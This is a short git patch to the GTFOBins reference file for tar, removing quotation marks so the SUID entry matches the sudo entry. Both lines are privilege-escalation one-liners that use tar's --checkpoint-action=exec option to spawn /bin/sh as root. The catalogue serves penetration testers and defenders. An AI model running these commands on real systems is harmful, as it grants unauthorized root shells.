From da0b49a84066cf223e343800a4231ce93b2c235c Mon Sep 17 00:00:00 2001 From: Andrea Cardaci Date: Fri, 25 May 2018 01:03:51 +0200 Subject: [PATCH] Coherence in tar code --- _gtfobins/tar.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/_gtfobins/tar.md b/_gtfobins/tar.md index fea1c78..b7ed7d4 100644 --- a/_gtfobins/tar.md +++ b/_gtfobins/tar.md @@ -5,5 +5,5 @@ functions: sudo-enabled: - code: sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh suid-limited: - - code: ./tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec="/bin/sh" + - code: ./tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh ---